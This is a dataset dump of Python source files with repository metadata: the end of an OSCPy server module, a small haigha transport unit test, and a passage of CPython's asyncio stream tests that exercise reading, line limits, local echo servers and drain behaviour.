the sender of the packet that triggered the callback, and send
the given message or bundle to it.
`timetag` is only used if `bundle` is True.
See `send_message` and `send_bundle` for info about the parameters.
Only one of `values` or `bundle` should be defined, if `values`
is defined, `send_message` is used with it, if `bundle` is
defined, `send_bundle` is used with its value.
"""
if not values:
values = []
sock, ip_address, response_port = self.get_sender()
if port is not None:
response_port = port
if bundle:
return self.send_bundle(
bundle, ip_address, response_port, timetag=timetag, sock=sock,
safer=safer
)
else:
return self.send_message(
address, values, ip_address, response_port, sock=sock
)
def address(self, address, sock=None, get_address=False):
"""Decorate functions to bind them from their definition.
`address` is the osc address to bind to the callback.
if `get_address` is set to True, the first parameter the
callback will receive will be the address that matched (useful
with advanced matching).
example:
server = OSCThreadServer()
server.listen('localhost', 8000, default=True)
@server.address(b'/printer')
def printer(values):
print(values)
send_message(b'/printer', [b'hello world'])
note:
This won't work on methods as it'll call them as normal
functions, and the callback won't get a `self` argument.
To bind a method use the `address_method` decorator.
"""
def decorator(callback):
self.bind(address, callback, sock, get_address=get_address)
return callback
return decorator
def address_method(self, address, sock=None, get_address=False):
"""Decorate methods to bind them from their definition.
The class defining the method must itself be decorated with the
`ServerClass` decorator, the methods will be bound to the
address when the class is instantiated.
See `address` for more information about the parameters.
example:
osc = OSCThreadServer()
osc.listen(default=True)
@ServerClass
class MyServer(object):
@osc.address_method(b'/test')
def success(self, *args):
print("success!", args)
"""
def decorator(decorated):
decorated._address = (self, address, sock, get_address)
return decorated
return decorator
def bind_meta_routes(self, sock=None):
"""This module implements osc routes to probe the internal state of a
live OSCPy server. These routes are placed in the /_oscpy/ namespace,
and provide information such as the version, the existing routes, and
usage statistics of the server over time.
These requests will be sent back to the client's address/port that sent
them, with the osc address suffixed with '/answer'.
examples:
'/_oscpy/version' -> '/_oscpy/version/answer'
'/_oscpy/stats/received' -> '/_oscpy/stats/received/answer'
messages to these routes require a port number as argument, to
know to which port to send to.
"""
self.bind(b'/_oscpy/version', self._get_version, sock=sock)
self.bind(b'/_oscpy/routes', self._get_routes, sock=sock)
self.bind(b'/_oscpy/stats/received', self._get_stats_received, sock=sock)
self.bind(b'/_oscpy/stats/sent', self._get_stats_sent, sock=sock)
def _get_version(self, port, *args):
self.answer(
b'/_oscpy/version/answer',
(__version__, ),
port=port
)
def _get_routes(self, port, *args):
self.answer(
b'/_oscpy/routes/answer',
[a[1] for a in self.addresses],
port=port
)
def _get_stats_received(self, port, *args):
self.answer(
b'/_oscpy/stats/received/answer',
self.stats_received.to_tuple(),
port=port
)
def _get_stats_sent(self, port, *args):
self.answer(
b'/_oscpy/stats/sent/answer',
self.stats_sent.to_tuple(),
port=port
)
| 34.260188
| 97
| 0.579147
|
fffd1cad99ea2b1172aa43af550545575025a3ab
| 648
|
py
|
Python
|
tests/unit/transports/transport_test.py
|
vitaly-krugl/haigha
|
e5320abfab91b89f4bad33644a7528e4517d96a7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/transports/transport_test.py
|
vitaly-krugl/haigha
|
e5320abfab91b89f4bad33644a7528e4517d96a7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/transports/transport_test.py
|
vitaly-krugl/haigha
|
e5320abfab91b89f4bad33644a7528e4517d96a7
|
[
"BSD-3-Clause"
] | null | null | null |
'''
Copyright (c) 2011-2015, Agora Games, LLC All rights reserved.
https://github.com/agoragames/haigha/blob/master/LICENSE.txt
'''
from chai import Chai
from haigha.transports.transport import Transport
class TransportTest(Chai):
def test_init_and_connection_property(self):
t = Transport('conn')
assert_equals('conn', t._connection)
assert_equals('conn', t.connection)
def test_process_channels(self):
t = Transport('conn')
ch1 = mock()
ch2 = mock()
chs = set([ch1, ch2])
expect(ch1.process_frames)
expect(ch2.process_frames)
t.process_channels(chs)
| 23.142857
| 62
| 0.658951
|
eab71e80308fefc20469c3c5c87d66c4b332fb63
| 69,862
|
py
|
Python
|
Lib/test/test_asyncio/test_streams.py
|
dhdavvie/cpython
|
c9345e382c630ddcc2b148b30954640e0e435c8a
|
[
"CNRI-Python-GPL-Compatible"
] | 4
|
2019-09-12T02:35:07.000Z
|
2022-01-19T23:04:45.000Z
|
Lib/test/test_asyncio/test_streams.py
|
anuragkumarak95/cpython
|
d309352c6fd93a51f2b3011ca8c2125d3a5d394b
|
[
"CNRI-Python-GPL-Compatible"
] | 3
|
2020-03-15T21:17:00.000Z
|
2020-03-15T22:50:40.000Z
|
Lib/test/test_asyncio/test_streams.py
|
anuragkumarak95/cpython
|
d309352c6fd93a51f2b3011ca8c2125d3a5d394b
|
[
"CNRI-Python-GPL-Compatible"
] | 2
|
2017-11-22T23:32:25.000Z
|
2018-11-15T01:31:39.000Z
|
"""Tests for streams.py."""
import contextlib
import gc
import io
import os
import queue
import pickle
import socket
import sys
import threading
import unittest
from unittest import mock
from test import support
try:
import ssl
except ImportError:
ssl = None
import asyncio
from asyncio.streams import _StreamProtocol, _ensure_can_read, _ensure_can_write
from test.test_asyncio import utils as test_utils
def tearDownModule():
asyncio.set_event_loop_policy(None)
class StreamModeTests(unittest.TestCase):
def test__ensure_can_read_ok(self):
self.assertIsNone(_ensure_can_read(asyncio.StreamMode.READ))
self.assertIsNone(_ensure_can_read(asyncio.StreamMode.READWRITE))
def test__ensure_can_read_fail(self):
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
_ensure_can_read(asyncio.StreamMode.WRITE)
def test__ensure_can_write_ok(self):
self.assertIsNone(_ensure_can_write(asyncio.StreamMode.WRITE))
self.assertIsNone(_ensure_can_write(asyncio.StreamMode.READWRITE))
def test__ensure_can_write_fail(self):
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
_ensure_can_write(asyncio.StreamMode.READ)
class StreamTests(test_utils.TestCase):
DATA = b'line1\nline2\nline3\n'
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
@mock.patch('asyncio.streams.events')
def test_ctor_global_loop(self, m_events):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
_asyncio_internal=True)
self.assertIs(stream._loop, m_events.get_event_loop.return_value)
def _basetest_open_connection(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with self.assertWarns(DeprecationWarning):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
def test_open_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
try:
with self.assertWarns(DeprecationWarning):
reader, writer = self.loop.run_until_complete(
open_connection_fut)
finally:
asyncio.set_event_loop(None)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_connection_no_loop_ssl(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_connection(
*httpd.address,
ssl=test_utils.dummy_ssl_context(),
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_unix_connection_no_loop_ssl(self):
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_unix_connection(
httpd.address,
ssl=test_utils.dummy_ssl_context(),
server_hostname='',
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
def _basetest_open_connection_error(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with self.assertWarns(DeprecationWarning):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer._protocol.connection_lost(ZeroDivisionError())
f = reader.read()
with self.assertRaises(ZeroDivisionError):
self.loop.run_until_complete(f)
writer.close()
test_utils.run_briefly(self.loop)
self.assertEqual(messages, [])
def test_open_connection_error(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection_error(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
def test_feed_empty_data(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'')
self.assertEqual(b'', stream._buffer)
def test_feed_nonempty_data(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
self.assertEqual(self.DATA, stream._buffer)
def test_read_zero(self):
# Read zero bytes.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.read(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
def test_read(self):
# Read bytes.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
read_task = asyncio.Task(stream.read(30), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA, data)
self.assertEqual(b'', stream._buffer)
def test_read_line_breaks(self):
# Read bytes without line breaks.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line1')
stream.feed_data(b'line2')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'line1', data)
self.assertEqual(b'line2', stream._buffer)
def test_read_eof(self):
# Read bytes, stop at eof.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
read_task = asyncio.Task(stream.read(1024), loop=self.loop)
def cb():
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'', data)
self.assertEqual(b'', stream._buffer)
def test_read_until_eof(self):
# Read all bytes until eof.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
read_task = asyncio.Task(stream.read(-1), loop=self.loop)
def cb():
stream.feed_data(b'chunk1\n')
stream.feed_data(b'chunk2')
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1\nchunk2', data)
self.assertEqual(b'', stream._buffer)
def test_read_exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.read(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.read(2))
def test_invalid_limit(self):
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=0, loop=self.loop,
_asyncio_internal=True)
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=-1, loop=self.loop,
_asyncio_internal=True)
def test_read_limit(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readline(self):
# Read one line. 'readline' will need to wait for the data
# to come from 'cb'
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'chunk1 ')
read_task = asyncio.Task(stream.readline(), loop=self.loop)
def cb():
stream.feed_data(b'chunk2 ')
stream.feed_data(b'chunk3 ')
stream.feed_data(b'\n chunk4')
self.loop.call_soon(cb)
line = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
self.assertEqual(b' chunk4', stream._buffer)
def test_readline_limit_with_existing_data(self):
# Read one line. The data is in Stream's buffer
# before the event loop is run.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'li')
stream.feed_data(b'ne1\nline2\n')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer should contain the remaining data after exception
self.assertEqual(b'line2\n', stream._buffer)
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'li')
stream.feed_data(b'ne1')
stream.feed_data(b'li')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# No b'\n' at the end. The 'limit' is set to 3. So before
# waiting for the new data in buffer, 'readline' will consume
# the entire buffer, and since the length of the consumed data
# is more than 3, it will raise a ValueError. The buffer is
# expected to be empty now.
self.assertEqual(b'', stream._buffer)
def test_at_eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
self.assertFalse(stream.at_eof())
self.loop.run_until_complete(stream.readline())
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
stream.feed_eof()
self.loop.run_until_complete(stream.readline())
self.assertTrue(stream.at_eof())
def test_readline_limit(self):
# Read one line. Streams are fed with data after
# their 'readline' methods are called.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=7, loop=self.loop,
_asyncio_internal=True)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer had just one line of data, and after raising
# a ValueError it should be empty.
self.assertEqual(b'', stream._buffer)
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=7, loop=self.loop,
_asyncio_internal=True)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2\n')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'chunk3\n', stream._buffer)
# check strictness of the limit
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=7, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'1234567\n')
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'1234567\n', line)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678\n')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readline_nolimit_nowait(self):
# All needed data for the first 'readline' call will be
# in the buffer.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA[:6])
stream.feed_data(self.DATA[6:])
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line1\n', line)
self.assertEqual(b'line2\nline3\n', stream._buffer)
def test_readline_eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'some data')
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'some data', line)
def test_readline_empty_eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', line)
def test_readline_read_byte_count(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
self.loop.run_until_complete(stream.readline())
data = self.loop.run_until_complete(stream.read(7))
self.assertEqual(b'line2\nl', data)
self.assertEqual(b'ine3\n', stream._buffer)
def test_readline_exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line\n', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readuntil_separator(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
with self.assertRaisesRegex(ValueError, 'Separator should be'):
self.loop.run_until_complete(stream.readuntil(separator=b''))
def test_readuntil_multi_chunks(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(separator=b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAAxxx')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'xxx', stream._buffer)
def test_readuntil_multi_chunks_1(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYaa')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYa')
stream.feed_data(b'aa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'aaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'aaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'Xaaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'Xaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'XXX')
stream.feed_data(b'a')
stream.feed_data(b'a')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'XXXaaa', data)
self.assertEqual(b'', stream._buffer)
def test_readuntil_eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'some dataAA')
stream.feed_eof()
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(cm.exception.partial, b'some dataAA')
self.assertIsNone(cm.exception.expected)
self.assertEqual(b'', stream._buffer)
def test_readuntil_limit_found_sep(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, limit=3,
_asyncio_internal=True)
stream.feed_data(b'some dataAA')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'not found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAA', stream._buffer)
stream.feed_data(b'A')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'is found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAAA', stream._buffer)
def test_readexactly_zero_or_less(self):
# Read exact number of bytes (zero or less).
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.readexactly(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
with self.assertRaisesRegex(ValueError, 'less than zero'):
self.loop.run_until_complete(stream.readexactly(-1))
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly(self):
# Read exact number of bytes.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA + self.DATA, data)
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly_limit(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.readexactly(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readexactly_eof(self):
# Read exact number of bytes (eof).
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_eof()
self.loop.call_soon(cb)
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(read_task)
self.assertEqual(cm.exception.partial, self.DATA)
self.assertEqual(cm.exception.expected, n)
self.assertEqual(str(cm.exception),
'18 bytes read on a total of 36 expected bytes')
self.assertEqual(b'', stream._buffer)
def test_readexactly_exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readexactly(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readexactly(2))
def test_exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
self.assertIsNone(stream.exception())
exc = ValueError()
stream.set_exception(exc)
self.assertIs(stream.exception(), exc)
def test_exception_waiter(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
async def set_err():
stream.set_exception(ValueError())
t1 = asyncio.Task(stream.readline(), loop=self.loop)
t2 = asyncio.Task(set_err(), loop=self.loop)
self.loop.run_until_complete(asyncio.wait([t1, t2]))
self.assertRaises(ValueError, t1.result)
def test_exception_cancel(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
t = asyncio.Task(stream.readline(), loop=self.loop)
test_utils.run_briefly(self.loop)
t.cancel()
test_utils.run_briefly(self.loop)
# The following line fails if set_exception() isn't careful.
stream.set_exception(RuntimeError('message'))
test_utils.run_briefly(self.loop)
self.assertIs(stream._waiter, None)
def test_start_server(self):
class MyServer:
def __init__(self, loop):
self.server = None
self.loop = loop
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
sock = socket.create_server(('127.0.0.1', 0))
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client,
sock=sock,
loop=self.loop))
return sock.getsockname()
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
sock = socket.create_server(('127.0.0.1', 0))
addr = sock.getsockname()
sock.close()
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client_callback,
host=addr[0], port=addr[1],
loop=self.loop))
return addr
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(addr):
with self.assertWarns(DeprecationWarning):
reader, writer = await asyncio.open_connection(
*addr, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
server = MyServer(self.loop)
with self.assertWarns(DeprecationWarning):
addr = server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
server = MyServer(self.loop)
with self.assertWarns(DeprecationWarning):
addr = server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@support.skip_unless_bind_unix_socket
def test_start_unix_server(self):
class MyServer:
def __init__(self, loop, path):
self.server = None
self.loop = loop
self.path = path
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
self.server = self.loop.run_until_complete(
asyncio.start_unix_server(self.handle_client,
path=self.path,
loop=self.loop))
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
start = asyncio.start_unix_server(self.handle_client_callback,
path=self.path,
loop=self.loop)
self.server = self.loop.run_until_complete(start)
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(path):
with self.assertWarns(DeprecationWarning):
reader, writer = await asyncio.open_unix_connection(
path, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
with self.assertWarns(DeprecationWarning):
server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
with self.assertWarns(DeprecationWarning):
server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
def test_read_all_from_pipe_reader(self):
# See asyncio issue 168. This test is derived from the example
# subprocess_attach_read_pipe.py, but we configure the
# Stream's limit so that twice it is less than the size
# of the data writter. Also we must explicitly attach a child
# watcher to the event loop.
code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
rfd, wfd = os.pipe()
args = [sys.executable, '-c', code, str(wfd)]
pipe = open(rfd, 'rb', 0)
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, limit=1,
_asyncio_internal=True)
protocol = _StreamProtocol(stream, loop=self.loop,
_asyncio_internal=True)
transport, _ = self.loop.run_until_complete(
self.loop.connect_read_pipe(lambda: protocol, pipe))
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
try:
asyncio.set_child_watcher(watcher)
create = asyncio.create_subprocess_exec(*args,
pass_fds={wfd},
loop=self.loop)
proc = self.loop.run_until_complete(create)
self.loop.run_until_complete(proc.wait())
finally:
asyncio.set_child_watcher(None)
os.close(wfd)
data = self.loop.run_until_complete(stream.read(-1))
self.assertEqual(data, b'data')
def test_streamreader_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that _StreamProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = asyncio.Stream(mode=asyncio.StreamMode.READ,
_asyncio_internal=True)
self.assertIs(reader._loop, self.loop)
def test_streamreaderprotocol_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that _StreamProtocol constructor
# retrieves the current loop if the loop parameter is not set
stream = mock.Mock()
protocol = _StreamProtocol(stream, _asyncio_internal=True)
self.assertIs(protocol._loop, self.loop)
def test_drain_raises_deprecated(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
q = queue.Queue()
def server():
# Runs in a separate thread.
with socket.create_server(('127.0.0.1', 0)) as sock:
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
async def client(host, port):
with self.assertWarns(DeprecationWarning):
reader, writer = await asyncio.open_connection(
host, port, loop=self.loop)
while True:
writer.write(b"foo\n")
await writer.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, ConnectionAbortedError,
BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
self.assertEqual([], messages)
def test_drain_raises(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
